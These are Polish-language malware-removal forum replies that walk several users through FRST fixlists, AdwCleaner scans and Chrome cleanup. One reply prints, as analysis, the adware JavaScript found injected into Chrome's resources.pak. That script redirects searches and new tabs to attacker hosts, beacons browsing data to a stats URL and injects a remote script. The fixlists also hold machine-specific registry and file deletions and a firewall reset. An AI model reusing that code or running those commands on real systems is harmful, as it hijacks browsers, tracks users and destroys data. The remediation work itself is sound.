picasso

Fix pomyślnie wykonany. AdwCleaner dopatrzył się jeszcze szczątków adware. Kolejna porcja zadań:

1. Uruchom AdwCleaner ponownie, tym razem zastosuj kombinację opcji Skanuj + Usuń. Gdy program ukończy czyszczenie:

2. Otwórz Notatnik i wklej w nim:

RemoveDirectory: C:\AdwCleaner
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

Wszystko zrobione. Poprawki:

1. Otwórz Notatnik i wklej w nim:

RemoveDirectory: C:\FRST\Quarantine
RemoveDirectory: C:\Program Files (x86)\Mozilla Firefox
RemoveDirectory: C:\Users\Admin\Downloads\FRST-OlderVersion
CMD: del /q C:\ProgramData\TNKsoftwares.exe
CMD: del /q C:\Users\Admin\Desktop\~ESETUninstaller.log
CMD: del /q C:\Users\Admin\Downloads\gvxn932x.exe
CMD: del /q C:\Windows\Minidump\*.dmp
Reg: reg delete HKCU\Software\Mozilla /f
Reg: reg delete HKCU\Software\MozillaPlugins /f
Reg: reg delete HKLM\SOFTWARE\Mozilla /f
Reg: reg delete HKLM\SOFTWARE\MozillaPlugins /f
Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Mozilla /f
Reg: reg delete HKLM\SOFTWARE\Wow6432Node\mozilla.org /f
Reg: reg delete HKLM\SOFTWARE\Wow6432Node\MozillaPlugins /f

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Powstanie kolejny plik fixlog.txt. Przedstaw go.

2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz wynikowy log z folderu C:\AdwCleaner

Nic więcej tu już nie wymyślę. Skoro firma hostingowa potwierdziła ruch, to najwyraźniej doszło do przejęcia konta, tylko nadal źródło problemu jest nieznane. Nic tu nie wskazywało, by w systemie była jakaś infekcja.

A DelFix wykonał zadanie. Skasuj z dysku plik C:\delfix.txt. To tyle.

Bez wątpienia był zainfekowany plik zasobów resources.pak. W tym kluczowym pliku przeglądarki adware zintegrowało następujący skrypt produkujący przekierowania i reklamy:

<!--
Copyright 2013 The Chromium Authors. All rights reserved.
Use of this source code is governed by a BSD-style license that can be
found in the LICENSE file.

We use an HTML page just to have access to the DOM, for URL
parsing. An alternative would be to include a URL parsing JavaScript
library with the extension but this approach is likely smaller and
faster.
-->
<html>
<head>
<script src="thunk.js"></script>
</head>
<body>
</body>
</html>
try{(function(d,u){function k(a){for(var b=0;b<a.length;b++){var e=b,c;c=a[b];if("string"===typeof c)a:{if(!v(c))for(var g=0;g<p.length;g++)if(p[g].test(c)){c="";break a}}else c=c.toString();c=encodeURIComponent(c.replace(w,"$cma;"));a[e]=c}(new Image).src="https://magicalfind-a.akamaihd.net/stats/?"+a.shift()+"="+a.join("|,|")}function m(a){return[   ".*volunteercentre.org.*",".*search.yahoo.com.*ddc[_-]bd.*",".*capn=ed_ui_.*_kw_001.*",".*ask.com.*siteid=28527.*",".*src=55cd729e57e760c05c8b466e.*",".*capn=ed_ui_jp_kw_002.*",".*thesmartsearch.net.*",".*search.results-hub.com.*",".*search.netbetterresults.com.*"," .*search.yahoo.com.*ddc[_-]bd.*",".*fluey.com.*",".*tapxchange.com.*",".*search.searchitknow.com.*",".*home.searchpile.com.*",".*au.ask.com.*28527.*",".*uk.ask.com.*32859.*",".*thesmartsearch.net.*p=ein.*",".*capn=ed_ui_.*_kw_004.*",".*search.top-arama.com.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/s.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/h.*",".*search.yahoo.com.*_bd_com.*",".*=__default.*"].some(function({return(new RegExp().test(a)})}function x(a,{var e=queryCommandValue;h(function(c){c||(c={});var g=c["BL_ST_"+a+"_"+e],d=Date.now();g?3E3>d-g?b&&b(!0):(c["BL_ST_"+a+"_"+e]=d,b&&b(!1),f(c)):(c["BL_ST_"+a+"_"+e]=d,f(c),b&&b(!1))})}function h(a){chrome.storage.local.get("BLGC_STORAGE",function({a&&a(b.BLGC_STORAGE)})}function f(a){var b={};b.BLGC_STORAGE=a;chrome.storage.local.set(b,function(){})}function q(a){try{if(0==a.length)return{hostName:""};var b=u.createElement("a");0!=a.indexOf("http")&&(a="http://"+a);b.href=a;return b}catch(e){}return{hostname:a}}function y(a){a=a.toLowerCase();for(var b=0;b<n.length;b++)if(-1!=a.indexOf(n[b].host.toLowerCase()))return b;return-1}function l(a,{try{b=b.replace(/[\[]/,"\[").replace(/[\]]/,"\]");var e=(new RegExp("[\?]"+b+"=([^]*)")).exec(a);return null==e?null:e[1]}catch(c){}}function z(a,{var e=l(a,n[b].oparam);switch({case 0:case 2:case 3:case 4:return!!e;case 1:var e=l(a,"type"),c=l(a,"hsimp"),g=l(a,"fr"),d=/^http(s)?:\/\/(.{2}\.)?(malaysia\.)?(y.*\.)?search\.yahoo\./;return!!g&&-1!=g.indexOf("ddc-bd")||!!c&&-1!=c.indexOf("ddc_bd")||!!e&&-1!=e.indexOf("_bd_com")||!d.test(a)||-1!=a.indexOf("/local/")}return!1}function r(a,{var e=-1,c="",g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ5ZBAFFRQAVbQ4LBQlcFVYUJhRaUgAQDAdHeVtdVQtFRAQUIR9aFQQTQkcFME0FA1UWQhNNfXRZBlASQFllKVdc&q=|search_term|",d=null,f=null;b.url&&!m(b.url)&&(f=q(b.url).hostname,h(function(h){h||(h={});if(-1!=(e=y(f))){if(h[a]&&(d=q(h[a]).hostname,(!f||f==d)&&1!=e))return;c=n[e].param;!z(b.url,e)&&(queryCommandValue=l(b.url,c))&&x(a,function(c){c?k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","SkippedSearch",b.url]):(g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ5ZBAFFRQAVbQ4LBQlcFVYUJhRaUgAQDAdHeVtdVQtFRAQUIR9aFQQTQkcFME0FA1UWQhNNfXRZBlASQFllKVdc&q=|search_term|".replace("|search_term|",queryCommandValue),chrome.tabs.update(a,{url:g}),k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","Search",b.url]))})}}))}function A(a,b,e){try{chrome.tabs.executeScript(a,{code:"if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://magicalfind-a.akamaihd.net/MagicalFind/cr?t=BLGC&g=7ae84d56-73d0-4c7f-b39a-2d9be424e17a&pn=Chrome'; document.head.appendChild(scr);}"})}catch(c){}-1!=t.indexOf(b.url)&&(m(e.url)||chrome.tabs.update(a,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAJCJQEMBQxHDAIQJAkVVVpGRxhBcwBZTAsVGFdGdAsMBAhGQBNBNARaAktXUUEeIlVfAh8fHHhCJ1BbAFU3SFtH"}),h(function(c){c||(c={});c[a]=b.url;f(c)}),d.skipNewTabMsg?d.skipNewTabMsg=!1:k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","NewTab",b.url]));d.firstRun=!1;r(a,;b.url&&h(function(c){c||(c={});c[a]=b.url;f(c)})}"undefined"==typeof d.firstRun&&(d.firstRun=!1);"undefined"==typeof d.skipNewTabMsg&&(d.skipNewTabMsg=!1);var t=["chrome://newtab/","safer://newtab/"],n=[{host:".bing.",param:"q",oparam:"qs"},{host:"search.yahoo.",param:"p",oparam:"fr"},{host:".google.",param:"q",oparam:"site"},{host:".ask.",param:"q",oparam:"qo"},{host:"search.aol.",param:"q",oparam:"s_it"},{host:"go.mail.ru",param:"q",oparam:"NA"},{host:"intent.clara-labs.",param:"q",oparam:"NA"},{host:"trovi.",param:"q",oparam:"NA"},{host:".plusnetwork.",param:"q",oparam:"NA"},{host:"isearch.bobrowser.",param:"q",oparam:"NA"},{host:"www-searching.",param:"q",oparam:"NA"},{host:".thesmartsearch.",param:"q",oparam:"NA"},{host:".search.safer.",param:"q",oparam:"NA"},{host:".cassiopessa.",param:"q",oparam:"NA"}],p=[/(?:\d[(). -]*?){9,16}/,/[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i],w=/,/g;btoa("94df1405-b2c7-479e-98ea-4be1fc81ab76_54_10");var v=function(){var a=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i;return function({return a.test(}}();chrome.runtime.onStartup.addListener(function(){d.firstRun=!0;d.skipNewTabMsg=!0;f({})});chrome.tabs.onReplaced.addListener(function(a,{var e,c;h(function(d){d||(d={});e=d[a];c=d[b];d[a]=c;d[b]=e;f(d)})});chrome.tabs.onRemoved.addListener(function(a){h(function({b||(b={});delete b[a];f(})});chrome.tabs.onCreated.addListener(function(a){if(a.id&&!a.openerTabId)if(d.firstRun){if(m(a.url))return;chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggUIVwAVV1EFxgUc10ITA0SFlMOIgoBABRDRQxBJQ0KVVxAFlQFIk0FA1oDB0VXfVtUBlpXTwhuIV5RAlgdZ1xNJA=="});k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","HomePage",a.url])}else-1==t.indexOf(a.url)||m(a.url)||(chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAJCJQEMBQxHDAIQJAkVVVpGRxhBcwBZTAsVGFdGdAsMBAhGQBNBNARaAktXUUEeIlVfAh8fHHhCJ1BbAFU3SFtH"}),k(["BL_YS_Action_2","MagicalFind","7ae84d56-73d0-4c7f-b39a-2d9be424e17a","blgc","NewTab",a.url]));else a.openerTabId&&h(function({b||(b={});b[a.id]=b[a.openerTabId];f(});d.firstRun=!1});chrome.webNavigation.onBeforeNavigate.addListener(function(a){0===a.frameId&&r(a.tabId,{url:a.url})});chrome.tabs.onUpdated.addListener(function(a,b,d){A(a,b,d)})})(window,document)}catch(d){};// Copyright 2013 The Chromium Authors. All rights reserved.
//

Przeglądarka została przeinstalowana, co automatycznie zlikwidowało modyfikację. Teraz drobnostki do wykonania:

1. Deinstalacje:

- Odinstaluj starą wersję (luki!) Adobe Reader 9.1 Lite.

- Usuń szczątkowy ukryty program. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście wpis AVG PC TuneUp 2015 (pl-PL) > Dalej.

2. Otwórz Notatnik i wklej w nim:

CloseProcesses:
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction 
HKU\S-1-5-21-3186815166-2112447843-958612567-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-3186815166-2112447843-958612567-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKU\S-1-5-21-3186815166-2112447843-958612567-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
Task: {C3EC9D74-38F9-4939-87AC-AF3FA7D68859} - System32\Tasks\{40392E45-CAC5-4EB7-B95E-BDE5ED4EAC60} => pcalua.exe -a "D:\Pobrane\Gry\inkwizycja\Dragon Age Inquisition - Deluxe Edition\__Installer\vc\vc2010sp1\redist\vcredist_x64.exe" -d "D:\Pobrane\Gry\inkwizycja\Dragon Age Inquisition - Deluxe Edition\__Installer\vc\vc2010sp1\redist"
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

3. Zrób nowy log FRST z opcji Skanuj (Scan) na następującym ustawieniu: w sekcji Whitelist (Filtrowanie) odznacz sekcję Internet, a pól Addition i Shortcut już nie zaznaczaj. Dołącz też plik fixlog.txt.

Tak, są tu sterowniki StdLib wprowadzone przez adware i jest to potencjalna przyczyna BSOD. Ale to ledwie część problemu, gdyż w tle działa innogatunkowa infekcja typu trojan (falsyfikat svchost.exe), wprowadzona przez lewy dodatek Xenobot:

2015-10-30 18:38 - 2015-10-30 18:38 - 00000000 ____D C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\XenoBot

2015-10-30 18:36 - 2015-10-30 18:36 - 00083456 ____H C:\Users\Admin\AppData\Roaming\svchost.exe

2015-10-30 18:30 - 2015-10-30 18:33 - 06201516 _____ C:\Users\Admin\Downloads\Xenobot+Crack (1).rar

2015-10-30 18:09 - 2015-10-30 18:40 - 00000000 ____D C:\Users\Admin\Documents\XenoBot

2015-10-30 18:06 - 2015-10-30 18:07 - 00601349 _____ C:\Users\Admin\Downloads\xenoosiann2.rar

2015-10-30 18:00 - 2015-10-30 18:05 - 09393115 _____ C:\Users\Admin\Downloads\XenoBot.rar

I jest tu także bardzo stary ESET na sterownikach z 2011 i on także powinien być zaadresowany.

Akcje do przeprowadzenia:

1. Deinstalacje:

- Odinstaluj via Panel sterowania stare wersje oraz złe aplikacje: Adobe Flash Player 15 Plugin, Adobe Reader XI (11.0.13) - Polish, DownLite, Java 7 Update 40, Mozilla Firefox 16.0.1 (x86 pl) + Mozilla Maintenance Service, ESET NOD32 Antivirus, XenoBot Apophis. Przy deinstalacji Firefox zaznacz usuwanie profilu z dysku. Skasuj też z dysku wszystkie pobrane paczki Xenobot.

- Następnie wejdź w Tryb awaryjny i popraw jeszcze narzędziem ESET Uninstaller. Po akcji opuść Tryb awaryjny.

2. Otwórz Notatnik i wklej w nim:

CloseProcesses:
CreateRestorePoint:
R1 wStLibG64; C:\Windows\System32\drivers\wStLibG64.sys [61112 2014-03-14] (StdLib)
R1 {58aaf827-6246-4d80-8213-f02005f6345c}w64; C:\Windows\System32\drivers\{58aaf827-6246-4d80-8213-f02005f6345c}w64.sys [48776 2015-02-24] (StdLib)
R1 {b9a19c25-a741-47e5-91a2-0b62bef307ff}w64; C:\Windows\System32\drivers\{b9a19c25-a741-47e5-91a2-0b62bef307ff}w64.sys [61112 2014-06-12] (StdLib)
S0 sptd; \SystemRoot\System32\Drivers\sptd.sys [X]
HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\...\Run: [Windows.exe] => C:\Users\Admin\AppData\Roaming\Windows\Windows.exe [784951 2015-09-09] (‚„‘„‘„‘‚fx)
HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\...\Run: [MSTime] => C:\Users\Admin\AppData\Roaming\svchost.exe [83456 2015-10-30] ()
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ALFALINE.lnk [2015-10-13]
InternetURL: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TNKsoftwares.com.url -> 0
Task: {37A91A57-4BF2-4AC4-904D-01716ADBB8BF} - System32\Tasks\{0D517AEB-F02C-4656-9044-0E31255D10EF} => pcalua.exe -a "D:\Program Files\TeamSpeak 3 Client\plugins\ts3overlay\InstallHook.exe" -d "D:\Program Files\TeamSpeak 3 Client\plugins\ts3overlay\" -c ts3overlay_hook_win32.dll 10000
Task: {3EA0789D-CEF6-44F1-9319-A61ABC75132D} - System32\Tasks\{B197DD34-164A-422C-9884-1D186A56F473} => pcalua.exe -a C:\Users\Admin\Desktop\funnyvoice-setup.exe -d C:\Users\Admin\Desktop
Task: {717C666A-17A1-46F4-9824-D1B10415F884} - System32\Tasks\{6FD98B9C-A88B-4920-A98F-8E4A52074BE6} => pcalua.exe -a C:\PROGRA~2\COMMON~1\INSTAL~1\Driver\11\INTEL3~1\IDriver.exe -c /M{809D7E6D-915D-4EAD-821F-E13D93F37161} /l1033
Task: {A76421E4-330B-4A8B-A05F-AACAB986D607} - System32\Tasks\{848D1DC3-791C-485C-BDFA-CC0AA71D4DCC} => pcalua.exe -a "D:\Program Files (x86)\Steam\steamapps\common\arma 2 operation arrowhead\BEsetup\Setup_BattlEyeARMA2OA.exe" -d "D:\Program Files (x86)\Steam\steamapps\common\arma 2 operation arrowhead\BEsetup"
Task: {C41E4907-DEA4-4CB2-8776-62B2EC738D0C} - System32\Tasks\{988AE7F0-6AED-49E0-9C9C-48319DF1D0E4} => Chrome.exe hxxp://ui.skype.com/ui/0/6.20.0.104/pl/abandoninstall?page=tsMain
GroupPolicy: Ograniczenia - Chrome 
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia 
HKU\S-1-5-21-2953119984-1137956692-2323332510-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://rts.dsrlte.com?affID=na
SearchScopes: HKU\S-1-5-21-2953119984-1137956692-2323332510-1000 -> DefaultScope {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://search.babylon.com/?q={searchTerms}&affID=112250&babsrc=SP_ss&mntrId=c62e8f7f000000000000000000000000
SearchScopes: HKU\S-1-5-21-2953119984-1137956692-2323332510-1000 -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL = hxxp://search.babylon.com/?q={searchTerms}&affID=112250&babsrc=SP_ss&mntrId=c62e8f7f000000000000000000000000
SearchScopes: HKU\S-1-5-21-2953119984-1137956692-2323332510-1000 -> {7D0D1FAF-64FD-4A23-8EB7-870846F875A6} URL = hxxp://rts.dsrlte.com/?affID=na&q={searchTerms}&r=887
C:\ProgramData\TEMP
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced Tactical Center
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Asprate
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Codemasters
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes III
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SopCast
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Auto
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tibia Testserver
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TNod User & Password Finder
C:\Users\Admin\AppData\Local\CRE
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\Windows
C:\Windows\System32\drivers\{58aaf827-6246-4d80-8213-f02005f6345c}w64.sys
C:\Windows\System32\drivers\{b9a19c25-a741-47e5-91a2-0b62bef307ff}w64.sys
C:\Windows\System32\drivers\wStLibG64.sys
Reg: reg delete HKCU\Software\Google\Chrome\Extensions /f
Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher" /f
Reg: reg delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\DAEMON Tools Lite" /f
Reg: reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains" /f
CMD: netsh advfirewall reset
Hosts:
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

3. Wyczyść Google Chrome:

• Zresetuj synchronizację (o ile włączona): KLIK.
• Ustawienia > karta Rozszerzenia > odinstaluj Vuze Remote
• Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
• Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz.

Trochę się pośpieszyłeś z tą reinstalacją Google Chrome, gdyż miałam w zamiarze podać szczegółowe kroki jak to zrobić (krok pierwszy przed deinstalacją to wyłączenie synchronizacji z serwerem, o ile włączona). Przy okazji także miały być wdrażane mniejsze korekty.

Poczekam na zawartość folderu, by zaadresować merytorycznie całość zagadnienia, i podam jeszcze kroki dodatkowe.

Temat przenoszę do działu Sieci. W raportach nie ma żadnych oznak infekcji mogącej powodować opisywany efekt. Są tylko szczątki adware, które jednak nie są powiązane z usterką. Doczyszczanie w spoilerze.

CloseProcesses:
CreateRestorePoint:
CHR HomePage: Default -> hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBPxn49PYmQ6e1krQXBFZY3csaPZOdOtvAHJIHISFKPwEKvR8i_cjQqY92VQtLxLQVQgKaD7aZHbAk_OHQCtAiMm7HA_gXjCy91BXMLpajkdbl7geOC2jflObo7HNs63vpQfbHb_dkpwQxYcROfp98KC0XIxDrXPjPR6w,,
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://www.bing.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-424717709-614010296-2372388338-1000 -> DefaultScope {ielnksrch} URL = hxxp://www.bing.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-424717709-614010296-2372388338-1000 -> {ielnksrch} URL = hxxp://www.bing.com/search?q={searchTerms}
C:\Program Files (x86)\mozilla firefox\browser\searchplugins
C:\Users\cisu\AppData\Roaming\Shortcut
C:\Users\cisu\Desktop\Continue OpenOffice.org installation.lnk
EmptyTemp:

I wg raportu FRST logi były robione przy braku połączenia, jest też jakieś urządzenie Ethernet raportowane jako niedziałające ze względu na brak sterowników:

DNS Servers: Urządzenie nie jest podłączone do internetu.
 

==================== Wadliwe urządzenia w Menedżerze urządzeń =============
 

Name: Kontroler Ethernet

Description: Kontroler Ethernet

Class Guid:

Manufacturer:

Service:

Problem: : The drivers for this device are not installed. (Code 28)

Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Sugestie:

1. Ślady adware, nie wiadomo co dokładnie było wcześniej, na wszelki wypadek zresetuj cały Winsock (część Protocol i NameSpace): KLIK.

2. Przeinstaluj urządzenia sieciowe oraz uzupełnij w/w brakujące sterowniki.

3. W przypadku braku rezultatów podaj dane wymagane działem Sieci: KLIK.

1. Tak, Fix zdołał zrobić tylko część zadania. Podejście poprawkowe. Otwórz Notatnik i wklej w nim:

DeleteKey: HKLM\SOFTWARE\Classes\qpakfile
DeleteKey: HKLM\SOFTWARE\_CrossriderRegNamePlaceHolder_
DeleteKey: HKLM\SOFTWARE\downchecker
DeleteKey: HKLM\SOFTWARE\Crossrider
DeleteKey: HKLM\SOFTWARE\FFPluginHp
DeleteKey: HKLM\SOFTWARE\GlobalUpdate
DeleteKey: HKLM\SOFTWARE\GoHD
DeleteKey: HKLM\SOFTWARE\InstalledBrowserExtensions
DeleteKey: HKLM\SOFTWARE\ihpmserver
DeleteKey: HKLM\SOFTWARE\RayDld
DeleteKey: HKLM\SOFTWARE\Reg\Clean
DeleteKey: HKLM\SOFTWARE\SavePass 1.1
DeleteKey: HKLM\SOFTWARE\sweet-pageSoftware
DeleteKey: HKLM\SOFTWARE\Tencent
DeleteKey: HKLM\SOFTWARE\Tutorials
DeleteKey: HKLM\SOFTWARE\Yahoo\Companion
DeleteKey: HKLM\SOFTWARE\WdsManPro
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\SavePass 1.1
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\GoHD
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GLOBALUPDATE.EXE
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_QMIEPROTECT
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_QQPCRTP
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TAOACCELERATOR
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_TSFLTMGR
DeleteKey: HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\WdsManPro
DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_QMUDISK
DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_QQPCRTP
DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_TAOACCELERATOR
DeleteKey: HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_TSFLTMGR
DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_QMUDISK
DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_QQPCRTP
DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_TAOACCELERATOR
DeleteKey: HKLM\SYSTEM\ControlSet003\Enum\Root\LEGACY_TSFLTMGR
DeleteKey: HKLM\SYSTEM\WifiSafeCfg
DeleteKey: HKU\S-1-5-18\Software\Tencent
DeleteKey: HKU\S-1-5-18\Software\Yahoo\Companion
RemoveDirectory: C:\AdwCleaner
RemoveDirectory: C:\Documents and Settings\All Users\Documents\ShopperPro
RemoveDirectory: C:\Documents and Settings\Administrator\Application Data\Mozilla
RemoveDirectory: C:\Documents and Settings\Gość\Application Data\Mozilla
RemoveDirectory: C:\Documents and Settings\Krzysztof\Application Data\Mozilla\Firefox\Profiles\12h1ceb6.default-1404211074967
RemoveDirectory: C:\FRST\Quarantine
CMD: del /q "C:\Documents and Settings\Krzysztof\Desktop\Mozilla Firefox.lnk"
CMD: del /q C:\WINDOWS\system32\roboot.exe
EmptyTemp:

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Nastąpi restart. Powstanie kolejny fixlog.txt. Przedstaw go.

2. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście odpadkowy wpis Facebook Update Helper > Dalej.

W raportach brak oznak oczywistej infekcji w Chrome, poza sponsorowaną wyszukiwarką Google (z sufiksem trackid=sp-004752), co z pewnością nie jest przyczyną problemów. To oznacza, że prawdopodobnie jest zmodyfikowany globalny plik zasobów resources.pak i będzie konieczna reinstalacja przeglądarki. Należy potwierdzić obecność tej modyfikacji. Poproszę o przesłanie katalogu Google Chrome do ręcznej analizy. Skopiuj na Pulpit folder:

C:\Program Files (x86)\Google\Chrome

Spakuj do ZIP, shostuj gdzieś i prześlij mi link do paczki na PW.

PS. Uwaga na przyszłość: ComboFix słabo się nadaje do czyszczenia adware. Najbardziej specjalizowane programy to AdwCleaner i MBAM.

Panda odinstalowana, sfc zrobione, fix zrobiony.

Czy po deinstalacji Pandy nastąpiła jakaś poprawa? Skan SFC nie wykrył żadnych błędów.

Za to Huston, mamy problem... nowy problem... Który zauważyłam po wywaleniu Pandy... Nie działa Centrum akcji...

Zastosuj narzędzie Fix-it z artykułu KB945011. Nie sugeruj się formułą artykułu, procedura usuwania wartości z klucza TrayNotify służy naprawianiu wielu usterek tej strefy.

VBox działa i działał normalnie.

Dziennik zdarzeń wskazuje, że jeden ze sterowników nie jest ładowany. Uruchom Autoruns, w karcie Drivers odznacz pozycję VBoxDrv.

Co do IE: jest ono wyłączone. Instalowałam dawno temu, po postawieniu systemu, wszystkie aktualizacje do niego, ale potem go wyłączyłam - nie używam, a tylko ciągle otwierały mi się w nim linki, mimo domyślnego liska -.- Dlaczego teraz jest 8 a nie 11? Nie mam zielonego pojęcia... Nie widać też żadnych aktualizacji do niego.

To wyłączenie komponentu jest równoznaczne z cofnięciem wersji Internet Explorer do starszej wersji. I skoro obecnie komponent jest zdeaktywowany, to nie będzie aktualizacji dla niego pokazywanych.

Fix wykonany pomyślnie. Zastosuj DelFix i wyczyść foldery Przywracania systemu: KLIK.

Na przyszłość: nie uruchamiaj FRST Fix dwa razy, niezależnie od tego czy był błąd. Podwójne uruchomienie popsuło szyki, nie ma raportu, więc nie wiadomo ile zostało usunięte. No cóż, poproszę ponownie o to:

2. Uruchom FRST, w polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy log.

 

Tencent;QQPCMgr

 

3. Uruchom AdwCleaner. Wybierz opcję Skanuj (na razie nic nie usuwaj) i dostarcz wynikowy log z folderu C:\AdwCleaner.

